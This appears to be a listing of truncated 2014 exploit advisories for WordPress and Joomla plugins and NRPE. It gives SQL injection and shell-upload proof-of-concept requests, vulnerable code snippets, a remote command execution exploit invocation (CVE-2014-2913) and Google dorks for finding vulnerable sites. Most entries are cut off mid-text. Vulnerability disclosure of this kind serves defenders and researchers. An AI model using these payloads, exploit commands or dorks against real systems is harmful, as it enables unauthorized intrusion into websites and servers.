######################
# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed)
Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :
function editgallery($id)
{
global $wpdb;
if(isset($_GET["removeslide"])){
if($_GET["removeslide"] !...
######################
# Exploit Title : WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://tribulant.com
# Software Link : http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
# Date : 2014-08-09
# Tested on : Windows 7 / Mozilla Firefox
######################
# Description : Any user could upload php files (administrator by default).
######################
# Location
http://127.0.0.1/wp-content/plugins/slideshow-gallery/views/admin/slides/save.php
######################
# PoC Exploit:
POST
Host=127.0.0.1
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31....
NRPE 2.15 Remote Command Execution python Exploit – CVE-2014-2913
Download Exploit: HERE
Custom Command Mode: claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -c check_users
$$\ $$\ $$$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$$$$$$\
$$$\ $$ |$$ __$$\ $$ __$$\ $$ _____| $$ __$$\ $$$$ | $$ ____|
$$$$\ $$ |$$ | $$ |$$ | $$ |$$ | \__/ $$ | \_$$ | $$ |
$$ $$\$$ |$$$$$$$ |$$$$$$$ |$$$$$\ $$$$$$ | $$ | $$$$$$$\
$$ \$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \_____$$\
$$ |\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\ $$ |
$$ | \$$ |$$ | $$ |$$ | $$$$$$$$\ $$$$$$$$\ $$\ $$$$$$\$$$$$$ |
\__| \__|\__| \__|\__| \________| \________|\__|\______|\______/
$$$$$$$\ $$$$$$\ $$$$$$$$\
$$ __$$\ $$ __$$\ $$ _____|
$$ | $$ |$$ / \__|$$ |
$$$$$$$ |$$ | $$$$$\
$$ __$$< $$ | $$ __|
$$ | $$ |$$ | $$\ $$ |
$$ | $$ |\$$$$$$ |$$$$$$$$\
\__| \__| \______/ \________|
NRPE <= 2....
######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
inurl:option=com_spidervideoplayer # Date : 2014-08-26
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
"theme" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www....
######################
# Exploit Title : WordPress GB Gallery Slideshow 1.5 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://gb-plugins.com/
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
# Date : 2014-08-09
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
Linux / Mozilla Firefox
######################
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
######################
# Vulnerable code :
if(isset($_POST['selected_group'])){
global $gb_post_type, $gb_group_table, $wpdb;
$my_group_id = $_POST['selected_group'];
$my_group = $wpdb->get_results( "SELECT groups FROM $gb_group_table WHERE id = "....